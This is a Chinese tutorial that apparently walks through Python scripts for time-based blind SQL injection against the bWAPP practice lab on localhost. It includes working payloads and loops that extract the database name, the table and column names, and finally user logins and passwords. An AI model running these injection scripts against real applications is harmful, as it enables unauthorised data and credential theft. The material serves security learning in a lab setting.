sql盲注python脚本学习 (基于bWAPP靶场)

全局部分

python 复制代码
# 数组转字符串
from shlex import join
# 请求
import requests
# 记时
import time

r = requests.session()

登录

python 复制代码
def login():
    login_url = 'http://127.0.0.1:1234/login.php'
    params = dict(
        login='bee',
        password='bug',
        security_level=0,
        form='submit'
    )

    res = r.post(login_url, params)
    print(res) # 返回的响应码

获取当前库名

python 复制代码
def get_db_name_length():
    len = 1
    while(1):
        sql_str = f"1' or if(length(database())={len},sleep(1),1) -- "
        url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
        start = time.time()
        r.get(url)
        if (time.time()-start)>1: 
            return len
        len+=1

def get_db_name(max):
    db_name = [''] * max
    for len in range(1,max+1,1):
        ACI = 48
        while(ACI<128):
            sql_str = f"1' or if(ascii(substr(database(),{len},1))={ACI},sleep(1),1) -- "
            url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
            start = time.time()
            r.get(url)
            if (time.time() - start) > 1:
                db_name[len-1]=chr(ACI)
                break
            ACI +=1
    return db_name

db_name = get_db_name(get_db_name_length())
print(join(db_name))
# 结果:b W A P P

获取全部表名

python 复制代码
def get_table_name_length():
    len = 1
    while(1):
        sql_str = f"1' or if(length((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))={len},sleep(1),1) -- "
        url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
        start = time.time()
        r.get(url)
        if (time.time()-start)>1:
            return len
        len+=1

def get_table_name(max):
    table_name = [''] * max
    for len in range(1,max+1,1):
        ACI = 48
        while(ACI<128):
            sql_str = f"1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),{len},1))={ACI},sleep(1),1) -- "
            url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
            start = time.time()
            r.get(url)
            if (time.time() - start) > 1:
                print(chr(ACI))
                table_name[len-1]=chr(ACI)
                break
            ACI +=1
    return table_name

table_name=get_table_name(get_table_name_length())
print(join(table_name))
# 结果:b l o g '' h e r o e s '' m o v i e s '' u s e r s '' v i s i t o r s

获取字段名

仅仅更改sql_str

python 复制代码
sql_str = f"1' or if(length((select group_concat(column_name) 
from information_schema.columns where table_schema='bWAPP' and table_name='users'))=
{len},sleep(1),1) -- "

sql_str = f"1' or if(ascii(substr((select group_concat(column_name) 
from information_schema.columns where table_schema='bWAPP' and table_name='users'),
{len},1))={ACI},sleep(1),1) -- "

获取用户信息

python 复制代码
def get_users_passwd():
    cou = 1
    while (1):
        sql_str = f"1' or if(length((select group_concat(concat(login,'-',password)) from bWAPP.users))={cou},sleep(0.1),1) -- "
        url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
        start = time.time()
        r.get(url)
        if (time.time() - start) > 1:
            print(cou)
            break
        cou+=1

    user_str = ['']*cou
    for x in range(1,cou,1):
        ACI = 48
        while (ACI < 128):
            sql_str = f"1' or if(ascii(substr((select group_concat(concat(login,'-',password)) from bWAPP.users),{x},1))={ACI},sleep(0.1),1) -- "
            url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'
            start = time.time()
            r.get(url)
            if (time.time() - start) > 1:
                print(chr(ACI))
                user_str[x-1]=chr(ACI)
                break
            ACI+=1
    return join(user_str)
相关推荐
九年义务漏网鲨鱼1 小时前
【大模型学习 | MINIGPT-4原理】
人工智能·深度学习·学习·语言模型·多模态
jz_ddk2 小时前
[学习] C语言数学库函数背后的故事:`double erf(double x)`
c语言·开发语言·学习
蹦蹦跳跳真可爱5892 小时前
Python----OpenCV(图像増强——高通滤波(索贝尔算子、沙尔算子、拉普拉斯算子),图像浮雕与特效处理)
人工智能·python·opencv·计算机视觉
nananaij3 小时前
【Python进阶篇 面向对象程序设计(3) 继承】
开发语言·python·神经网络·pycharm
雷羿 LexChien3 小时前
从 Prompt 管理到人格稳定:探索 Cursor AI 编辑器如何赋能 Prompt 工程与人格风格设计(上)
人工智能·python·llm·编辑器·prompt
爱莉希雅&&&3 小时前
技术面试题,HR面试题
开发语言·学习·面试
星辰离彬3 小时前
Java 与 MySQL 性能优化:Java应用中MySQL慢SQL诊断与优化实战
java·后端·sql·mysql·性能优化
敲键盘的小夜猫3 小时前
LLM复杂记忆存储-多会话隔离案例实战
人工智能·python·langchain
高压锅_12204 小时前
Django Channels WebSocket实时通信实战:从聊天功能到消息推送
python·websocket·django
Chef_Chen4 小时前
从0开始学习计算机视觉--Day08--卷积神经网络
学习·计算机视觉·cnn